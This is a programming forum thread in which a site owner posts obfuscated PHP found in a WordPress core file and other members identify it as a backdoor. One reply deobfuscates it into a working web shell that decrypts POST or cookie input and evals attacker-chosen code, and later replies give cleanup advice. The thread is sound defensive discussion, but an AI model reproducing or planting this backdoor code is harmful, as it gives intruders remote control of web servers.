7 Replies - 331 Views - Last Post: 20 March 2018 - 10:52 AM Rate Topic: -----

#1 trn   User is offline

  • New D.I.C Head

Reputation: 0
  • View blog
  • Posts: 1
  • Joined: 28-February 18

Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 28 February 2018 - 10:04 AM

When I'm trying to access my website this is showing me this error "Parse error: syntax error, unexpected '$j205' (T_VARIABLE) in /home/tutori43/public_html/wp-includes/embed.php on line 1 "

So, I opened my C-Panel and check that file I didn't find any error. So, Can anyone help me to find the error?
The Php code for line 1 is::

1.  <?php                                                                          $f27b62 = 412;$GLOBALS['a04c']=Array();global$a04c;$a04c=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['f43df32b']="\x7d\x64\x4e\x3c\x43\x78\x46\x22\xd\x38\x61\x44\x4b\x79\x42\x3d\x54\x3a\x6a\x37\x6b\x73\x2a\x7e\x4a\x23\x3b\x51\xa\x7a\x50\x60\x24\x40\x6f\x69\x25\x3e\x5f\x28\x39\x6e\x67\x70\x65\x68\x20\x52\x5e\x47\x56\x57\x9\x5b\x2c\x36\x41\x29\x55\x48\x75\x6c\x31\x27\x4d\x7b\x66\x4c\x6d\x53\x33\x2f\x26\x2d\x49\x76\x35\x2e\x2b\x30\x32\x7c\x21\x63\x45\x5c\x71\x3f\x74\x34\x62\x72\x4f\x5a\x58\x5d\x59\x77";$a04c[$a04c['f43df32b'][97].$a04c['f43df32b'][40].$a04c['f43df32b'][83].$a04c['f43df32b'][40]]=$a04c['f43df32b'][43].$a04c['f43df32b'][10].$a04c['f43df32b'][83].$a04c['f43df32b'][20];$a04c[$a04c['f43df32b'][97].$a04c['f43df32b'][1].$a04c['f43df32b'][62].$a04c['f43df32b'][10].$a04c['f43df32b'][10].$a04c['f43df32b'][89].$a04c['f43df32b'][89].$a04c['f43df32b'][79]]=$a04c['f43df32b'][83].$a04c['f43df32b'][34].$a04c['f43df32b'][60].$a04c['f43df32b'][41].$a04c['f43df32b'][88];$a04c[$a04c['f43df32b'][35].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][76].$a04c['f43df32b'][1]]=$a04c['f43df32b'][21].$a04c['f43df32b'][60].$a04c['f43df32b'][90].$a04c['f43df32b'][21].$a04c['f43df32b'][88].$a04c['f43df32b'][91];$a04c[$a04c['f43df32b'][91].$a04c['f43df32b'][1].$a04c['f43df32b'][66].$a04c['f43df32b'][62].$a04c['f43df32b'][62]]=$a04c['f43df32b'][21].$a04c['f43df32b'][88].$a04c['f43df32b'][91].$a04c['f43df32b'][61].$a04c['f43df32b'][44].$a04c['f43df32b'][41];$a04c[$a04c['f43df32b'][34].$a04c['f43df32b'][1].$a04c['f43df32b'][79].$a04c['f43df32b'][89].$a04c['f43df32b'][1].$a04c['f43df32b'][76].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][70]]=$a04c['f43df32b'][44].$a04c['f43df32b'][5].$a04c['f43df32b'][43].$a04c['f43df32b'][61].$a04c['f43df32b'][34].$a04c['f43df32b'][1].$a04c['f43df32b'][44];$a04c[$a04c['f43df32b'][5].$a04c['f43df32b'][83].$a04c['f43df32b'][83].$a04c['f43df32b'][79].$a04c['f43df32b'][66].$a04c['f43df32b'][19]]=$a04c['f43df32b'][21].$a04c['f43df32b'][88].$a04c['f43df32b'][91].$a04c['f43df32b'][38].$a04c['f43df32b'][91].$a04c['f43df32b'][44].$a04c['f43df32b'][43].$a04c['f43df32b'][44].$a04c['f43df32b'][10].$a04c['f43df32b'][88];$a04c[$a04c['f43df32b'][42].$a04c['f43df32b'][1].$a04c['f43df32b'][55].$a04c['f43df32b'][40].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][79].$a04c['f43df32b'][76]]=$_POST;$a04c[$a04c['f43df32b'][5].$a04c['f43df32b'][83].$a04c['f43df32b'][76].$a04c['f43df32b'][10].$a04c['f43df32b'][1].$a04c['f43df32b'][10].$a04c['f43df32b'][19]]=$_COOKIE;$cbf2dc1e4=Array($a04c['f43df32b'][91].$a04c['f43df32b'][10].$a04c['f43df32b'][41].$a04c['f43df32b'][1].$a04c['f43df32b'][34].$a04c['f43df32b'][68].$a04c['f43df32b'][62].$a04c['f43df32b'][91].$a04c['f43df32b'][10].$a04c['f43df32b'][41].$a04c['f43df32b'][1].$a04c['f43df32b'][34].$a04c['f43df32b'][68].$a04c['f43df32b'][80]);$b59b6a533=Array($a04c['f43df32b'][91].$a04c['f43df32b'][10].$a04c['f43df32b'][41].$a04c['f43df32b'][1].$a04c['f43df32b'][34].$a04c['f43df32b'][68].$a04c['f43df32b'][70]=>$a04c['f43df32b'][91].$a04c['f43df32b'][10].$a04c['f43df32b'][41].$a04c['f43df32b'][1].$a04c['f43df32b'][34].$a04c['f43df32b'][68].$a04c['f43df32b'][89]);foreach(Array($cbf2dc1e4,$a04c[$a04c['f43df32b'][42].$a04c['f43df32b'][1].$a04c['f43df32b'][55].$a04c['f43df32b'][40].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][79].$a04c['f43df32b'][76]],$b59b6a533,$a04c[$a04c['f43df32b'][5].$a04c['f43df32b'][83].$a04c['f43df32b'][76].$a04c['f43df32b'][10].$a04c['f43df32b'][1].$a04c['f43df32b'][10].$a04c['f43df32b'][19]])as$a89eab9){foreach($a89eab9as$j205=>$yc43c){$[email protected]$a04c[$a04c['f43df32b'][97].$a04c['f43df32b'][40].$a04c['f43df32b'][83].$a04c['f43df32b'][40]]($a04c['f43df32b'][59].$a04c['f43df32b'][22],$yc43c);$j205.=$a04c['f43df32b'][70].$a04c['f43df32b'][10].$a04c['f43df32b'][70].$a04c['f43df32b'][55].$a04c['f43df32b'][55].$a04c['f43df32b'][90].$a04c['f43df32b'][44].$a04c['f43df32b'][90].$a04c['f43df32b'][73].$a04c['f43df32b'][89].$a04c['f43df32b'][19].$a04c['f43df32b'][66].$a04c['f43df32b'][40].$a04c['f43df32b'][73].$a04c['f43df32b'][89].$a04c['f43df32b'][19].$a04c['f43df32b'][1].$a04c['f43df32b'][9].$a04c['f43df32b'][73].$a04c['f43df32b'][40].$a04c['f43df32b'][83].$a04c['f43df32b'][76].$a04c['f43df32b'][10].$a04c['f43df32b'][73].$a04c['f43df32b'][62].$a04c['f43df32b'][89].$a04c['f43df32b'][76].$a04c['f43df32b'][10].$a04c['f43df32b'][83].$a04c['f43df32b'][89].$a04c['f43df32b'][10].$a04c['f43df32b'][40].$a04c['f43df32b'][83].$a04c['f43df32b'][1].$a04c['f43df32b'][40].$a04c['f43df32b'][66];$if0c04=$yc43c^$a04c[$a04c['f43df32b'][35].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][76].$a04c['f43df32b'][1]]($a04c[$a04c['f43df32b'][5].$a04c['f43df32b'][83].$a04c['f43df32b'][83].$a04c['f43df32b'][79].$a04c['f43df32b'][66].$a04c['f43df32b'][19]]($j205,($a04c[$a04c['f43df32b'][91].$a04c['f43df32b'][1].$a04c['f43df32b'][66].$a04c['f43df32b'][62].$a04c['f43df32b'][62]]($yc43c)/$a04c[$a04c['f43df32b'][91].$a04c['f43df32b'][1].$a04c['f43df32b'][66].$a04c['f43df32b'][62].$a04c['f43df32b'][62]]($j205))+1),0,$a04c[$a04c['f43df32b'][91].$a04c['f43df32b'][1].$a04c['f43df32b'][66].$a04c['f43df32b'][62].$a04c['f43df32b'][62]]($yc43c));$if0c04=$a04c[$a04c['f43df32b'][34].$a04c['f43df32b'][1].$a04c['f43df32b'][79].$a04c['f43df32b'][89].$a04c['f43df32b'][1].$a04c['f43df32b'][76].$a04c['f43df32b'][40].$a04c['f43df32b'][89].$a04c['f43df32b'][70]]($a04c['f43df32b'][25],$if0c04);if($a04c[$a04c['f43df32b'][97].$a04c['f43df32b'][1].$a04c['f43df32b'][62].$a04c['f43df32b'][10].$a04c['f43df32b'][10].$a04c['f43df32b'][89].$a04c['f43df32b'][89].$a04c['f43df32b'][79]]($if0c04)==3){eval/*v119*/($if0c04[1]($if0c04[2]));exit();}}} ?><?php




Is This A Good Question/Topic? 0
  • +

Replies To: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

#2 modi123_1   User is online

  • Suitor #2
  • member icon



Reputation: 14357
  • View blog
  • Posts: 57,584
  • Joined: 12-June 08

Re: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 28 February 2018 - 10:07 AM

Looks malicious to me. Get rid of it and restore a backup.. then review your security.
Was This Post Helpful? 0
  • +
  • -

#3 CTphpnwb   User is offline

  • D.I.C Lover
  • member icon

Reputation: 3801
  • View blog
  • Posts: 13,787
  • Joined: 08-August 08

Re: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 28 February 2018 - 10:09 AM

Post the un-obfuscated version of your code.
Was This Post Helpful? 0
  • +
  • -

#4 RamonRobben   User is offline

  • D.I.C Addict
  • member icon

Reputation: 89
  • View blog
  • Posts: 580
  • Joined: 19-May 14

Re: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 16 March 2018 - 05:13 AM

The code is doing some weird stuff with variables such as $_POST and $_SESSION. I think its a script from C-Panel itself because it doesn't seem to do anything else except for executing code. I tried un-obfuscating the code but its difficult. If anyone is interested in how far I got trying to unobfuscate the code here yah go:

<?php

$f27b62 = 412;
$GLOBALS['a04c'] = Array();
global $a04c;
$a04c = $GLOBALS;
${"GLOBALS"}['f43df32b'] = "\x7d\x64\x4e\x3c\x43\x78\x46\x22\xd\x38\x61\x44\x4b\x79\x42\x3d\x54\x3a\x6a\x37\x6b\x73\x2a\x7e\x4a\x23\x3b\x51\xa\x7a\x50\x60\x24\x40\x6f\x69\x25\x3e\x5f\x28\x39\x6e\x67\x70\x65\x68\x20\x52\x5e\x47\x56\x57\x9\x5b\x2c\x36\x41\x29\x55\x48\x75\x6c\x31\x27\x4d\x7b\x66\x4c\x6d\x53\x33\x2f\x26\x2d\x49\x76\x35\x2e\x2b\x30\x32\x7c\x21\x63\x45\x5c\x71\x3f\x74\x34\x62\x72\x4f\x5a\x58\x5d\x59\x77";

$a04c["w9c9"] = "pack";
$a04c["wd1aa440"] = "count";
$a04c["i945d"] = "substr";
$a04c["rdf11"] = "strlen";
$a04c["od04d5943"] = "explode";
$a04c["xcc0f7"] = "str_repeat";
$a04c["gd699405"] = $_POST;
$a04c["xc5ada7"] = $_COOKIE;

//this is the same as array 2 but I think he forgot the =>
$cbf2dc1e4 = Array(
	"random1random2"
);

$b59b6a533 = Array(
	"random3" => "random4"
);

//3a366beb-47f9-47d8-9c5a-145ac4a9cd9f

foreach(Array($cbf2dc1e4, $_POST, $b59b6a533, $_COOKIE) as $a89eab9) {
  echo "<br><h1><b>------NEW ROUND------</b></h1>";
	foreach($a89eab9 as $j205 => $yc43c) {

    echo "<b><h3>a89eab9: </b></h3>";
    print_r($a89eab9);
    echo "<br><b><h3>yc43c:</b></h3> {$yc43c}";

		$yc43c = @pack("H*", $yc43c);
		$j205.= "3a366beb-47f9-47d8-9c5a-145ac4a9cd9f";
    echo "<br><b><h3>yc43c:</b></h3> {$yc43c} <br>";
    echo " <b><h3>j205:</b></h3> {$j205} <br>";

		$if0c04 = $yc43c ^ substr(str_repeat($j205, (strlen($yc43c) / strlen($j205)) + 1) , 0, strlen($yc43c));
    echo "<b><h3>printing if0c04 first stage</b></h3><br>";
    echo $if0c04;

		$if0c04 = explode("#", $if0c04);
    echo "<br><b><h3>printing if0c04 second stage</b></h3><br>";
    print_r($if0c04);

		if (count($if0c04) == 3) {
			eval //v119
			($if0c04[1]($if0c04[2]));
      echo "<br><b><h3>count is 3</b></h3><br>";
      echo "<b><h3>if0c04[1]: </b></h3> {$if0c04[1]} <b><h3>if0c04[2]: </b></h3> {$if0c04[2]}";
			exit();
		}
	}
}


?>




I wrote the echo's / prints myself to see what the values were from those variables.

This post has been edited by RamonRobben: 16 March 2018 - 05:13 AM

Was This Post Helpful? 0
  • +
  • -

#5 benanamen   User is offline

  • D.I.C Head

Reputation: 29
  • View blog
  • Posts: 194
  • Joined: 28-March 15

Re: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 16 March 2018 - 08:39 AM

It is not a C-Panel script. It is a malicious hacking script that allows an attacker to take control of your server. DELETE IT!

This post has been edited by benanamen: 16 March 2018 - 08:40 AM

Was This Post Helpful? 0
  • +
  • -

#6 ArtificialSoldier   User is offline

  • D.I.C Lover
  • member icon

Reputation: 2091
  • View blog
  • Posts: 6,398
  • Joined: 15-January 14

Re: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 16 March 2018 - 10:49 AM

Yes, this is a back door. If certain data is sent via post then it will perform various tasks to give the attacker access to anything. cPanel's API scripts are well-written and easy to read. This is not that.
Was This Post Helpful? 0
  • +
  • -

#7 Martyr2   User is offline

  • Programming Theoretician
  • member icon

Reputation: 5284
  • View blog
  • Posts: 14,105
  • Joined: 18-April 07

Re: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 19 March 2018 - 02:32 PM

I have cleaned up a few servers containing code just like and it is malicious for sure. I only comment now (after a couple days) because I want to make sure that anyone coming across this post realize it is malicious AND that it is probably not a lone. This type of script tends to spread itself, posing as innocent files, all through the filesystem it can see. It is almost NEVER alone. So if you see a script file that looks like this appear on your server, immediately scan all your web folders and look for files that might be named similar to other files, but with a radically different modification date. Clear signs you find one of these files is that you have a directory containing all one type of file and perhaps the same modification/created date and suddenly there is one file with a completely different date. Or the directory is all images and yet there is mysteriously a PHP file in the directory.

One server I cleaned out a little over 100 of these scripts. So take a close look at all the files or restore back to a point where you know they were clean.

P.S. If you have shell access also do a quick TOP or ps command and make sure there is no weird services running. On one server that was infected with stuff like this I found programs running doing cryptocurrency mining.

This post has been edited by Martyr2: 19 March 2018 - 02:35 PM

Was This Post Helpful? 0
  • +
  • -

#8 ArtificialSoldier   User is offline

  • D.I.C Lover
  • member icon

Reputation: 2091
  • View blog
  • Posts: 6,398
  • Joined: 15-January 14

Re: Parse error: syntax error, unexpected '$j205' (T_VARIABLE

Posted 20 March 2018 - 10:52 AM

The file modified times can also be a clue, I've been looking through servers that haven't had their files changed in over a year but you could see modified dates of only a couple weeks or months ago. Opening any of those files would have a big obfuscated chunk at the top of it. If you miss one of them, the one you miss might be used to infect everything all over again.
Was This Post Helpful? 0
  • +
  • -

Page 1 of 1